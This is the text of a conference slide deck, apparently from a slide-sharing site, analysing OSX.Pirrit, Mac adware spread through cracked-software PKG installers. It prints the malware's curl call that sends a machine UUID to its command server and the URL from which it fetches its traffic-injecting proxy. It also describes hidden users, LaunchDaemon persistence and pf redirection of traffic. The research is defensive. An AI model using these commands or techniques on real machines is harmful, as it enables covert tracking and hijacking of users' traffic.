OSX/Pirrit: The blue balls of OS X adware

© 2016 Cybereason Inc. All rights reserved.
OSX.Pirrit: The blue
balls of OS X adware

$ whoami
• Amit Serper (What’s with the weird name, dude?)
• Lead OS X and Linux security researcher @ Cybereason
• Low level research (Kernel, reversing, etc...)
• Writing poorly programmed attack simulation tools (crappy coder)
• Malware research
• HackingTeam server research (with @awfrazer):
• Slides: http://hackedteam.lol
• Paper: http://ht-paper.amit.wtf
• Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf
• Lead security researcher @ Israeli government agency (9 years)
• <REDACTED>
• Follow me on twitter: @0xAmit

$ cat /etc/motd

$ cat /Users/amit/agenda.txt
This talk is based on my blog post on objective-see.com. See
direct link: http://pirrit.amit.wtf

$ cat /Users/amit/agenda.txt
1. For those that weren’t around 15 years ago: Intro to adware
2. This apple is getting ripe: Adware on Mac
3. The blue balls: OSX.Pirrit

Intro to Adware
• Adware usually gets to your machine with installers.
• These installers install a program that you downloaded and then offer you to
add some other program that will enhance your expirience

Intro to Adware
1. Software that resides on one’s machine and displays ads
2. Adware divide into several categories:
A. Plain and stupid – Just displays popups without any context
B. The “norm” – Displays banners (and rarely popups) according to basic
metrics that are gathered from the browser
C. The black-ops operative – Installs a hidden program that can see your
entire traffic, injects ads to pages you visit and even over-rides legitimate
ads that were put there in the first place (That’s stealing!)

Adware on the Mac
1. Similar to windows, adware to OS X comes usually in the form of toolbars
2. These toolbars are safari plugins – like Spigot…
http://www.thesafemac.com/arg-spigot

Adware on the Mac
1. Similar to windows, adware to OS X comes usually in the form of toolbars
2. These toolbars are safari plugins – like Spigot…
3. Spigot also installs LaunchAgents!
http://www.thesafemac.com/arg-spigot

The story begins…
• An irc user “Xiano” popped in to #osxre @ freenode and told us that his
friend’s mac is acting weird
• He said that internet browsing is rather slow and some weird processes are
showing up.
• He then shared with us a weird executable called “sizzling”.
• Another channel member, “Paraxor” started reversing that executable and
quoted some function names
• It was immediately clear that this is some sort of adware because of these
strings

No, seriously you guys…

Qt?
• Qt (pronounced cute) is a cross-platform application development framework
• Allows a developer to maintain a single codebase for an application that will
run on Windows, Linux, Mac and other platforms…
• The ”cost” of that are a lot of external libraries that are linked with your
application

The story begins… (continued)
http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/

Let’s look at the binary (strings table)

Another URL in the strings table

Let’s google that url…
http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1
Gives 1 result to a JoeSandbox analysis of a Windows PE executable

Shorte.st – URL shortening service

Let’s google that…

Let’s look at the script – rec_script.sh

Windows is easy…

But removal instructions for mac?

Xiano was back with more…
• He found an app bundle called “DemoUpdater” on his friend’s machine.
• He mentioned that this app bundle was running under a different user which he
did not know.
• Inside the app bundle was a x64 Mach-O binary executable and a shell script
called Update2.sh.
• This was far more interesting.

In the executable - Suspicious functions and strings galore!

Mysterious domains
*.93a555685cc7443a8e1034efa1f18924.com
*.aa625d84f1587749c1ab011d6f269f7d64.com
*.2ff328dcee054f2f9a9a5d7e966e3ec0.com
*.aae219721390264a73aa60a5e6ab6ccc4e.com

And also… Some more windows crap

But what about that update2 shell script?
• When the executable finishes running, it executes Update2.sh
• It’s a HUGE script (330 lines) – it even has some inline python code (python –c)
• Gets the machine uuid via command line (ioreg, parses its huge output
with awk and grep)
• Sends the machine ID to a server in order to get a new ID back from the
server by issuing a curl command:
curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd"
• It validates your geolocation by curl’ing ipinfo.io/country and checks that
you are from US, UK, Spain, Australia, France, Germany, India, Italy,
Netherlands or New Zealand in order to download a different “ad
package”.
• It’s updating the C&C and telling it that the installation was successful, it
uses the uuid as an identifier.
• After the C&C was notified, the script will download and install another
program called “DemoInjector”

So here’s what we know until now
• It’s an adware
• It generates traffic
• It’s cross-platform
• It’s definetly trying to hide strings and domains inside the binary
• It adds a hidden user with a weird name – it has to get root access
• It runs weird processes with strange names
• It has a componenet called “DemoUpdater”

But here’s what no one knows
How the hell did people get infected?!

FLASH SIDEWAYS!

PKG file?
• Mac equivalent of the MSI (Installer file)
• An extensible archive format (XAR)
• Has a nice wizard with useful EULA messages
• Can be signed with a developer certificate
• Has the ability to run pre/post install scripts!

PKG file!
• Pkg files are a very convenient way to drop malware
• You can codesign them
• And you can just use the scripting features to do whatever you want to.

PKG file – Suspicious package
http://www.mothersruin.com/software/SuspiciousPackage/

PKG file – Suspicious package

Let’s look at this script

Entire process
User downloads
crack
Gets pkg
Pre install script
runs
Script downlodas
“DemoUpdater”
component
DemoUpdater
prepares the
infrastructure for
DemoInjector
Profit!

DemoUpdater
• DemoUpdater is the first component that’s actually being installed by Pirrit.
• This is the component that lays the groundwork for the traffic hijacking proxy
• This is the script that generates the strange names
• After a random name was generated, it is being written to com.common.plist
• It then creates another plist to hold its preferences. That plist is created with a
random name on each install (com.<RANDOMWORD>.preferences.plist)

DemoUpdater
• The script then carries on with creating the DemoUpdater bundle and
executable while not forgetting to change its name to make detection harder
• It then downloads the next component, DemoInjector and adding a
LaunchDaemon for it.

Wait… LaunchDaemons?
• A LaunchDaemon is an autorun in Mac speak
• It loads when the computer boots
• And just like everything in OS X, it’s also stored in a plist file

The soil is ready… Now – plant the seed
• After all of the basic building blocks were layed, it is time for the main event
• We have a random name generated for DemoUpdater
• We have an autorun set up for DemoUpdater
• Now it’s time to get the proxy and get crackin’!
• The proxy is DemoInjector (remember it from before?)
• It will be downloaded from:
"http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz
• The number in the tgz file is incremental – different version
• The latest version of DemoInjector is dit8 and it is from April 10th 2016.

The soil is ready… Now – plant the seed
• The proxy is called DemoInjector.
• It is also a QT project.
• It also has a lot of shell scripts!
• The most interesting one is install_injector.sh
• It also generates a random company name and executable name
• And it creates a hidden user!

A hidden user… Oh my!

Hide500Users?

Someone was reading Apple documentation 
https://support.apple.com/en-il/HT203998

Someone was reading Apple documentation 

Another LaunchDaemon, this time for DemoInjector

And now – Traffic redirection!
• DemoInjector is listening on 127.0.0.1:9882
• All of the packets that are generated by everyone but $HIDDEN_USERS are
forwarded to DemoInjector using pf
• These settings also exist in another file that is dropped by the installer, called
/etc/change_net_settings. There’s also a LaunchDaemon for that!

Aaaaand… Profit!

Droppers… Droppers everywhere!

I created a small removal script
http://github.com/aserper
Some people had problems with it…

Conclusion

THANKS !
1. PATRICK WARDLE / OBJECTIVE-SEE.COM / @PATRICKWARDLE
2. DATAGRAM – FOR THE AWESOME HOSPITALITY
3. My pals from Cybereason for the moral support (and for picking up the check)
4. @VISS
5. YOU!

THANKS !
Come see me popping shells @ fail of
things right after this!

you.
Thank

OSX/Pirrit: The blue balls of OS X adware

Recommended

Recommended

More Related Content

What's hot

What's hot (20)

Viewers also liked

Viewers also liked (9)

Similar to OSX/Pirrit: The blue balls of OS X adware

Similar to OSX/Pirrit: The blue balls of OS X adware (20)

Recently uploaded

Recently uploaded (20)

OSX/Pirrit: The blue balls of OS X adware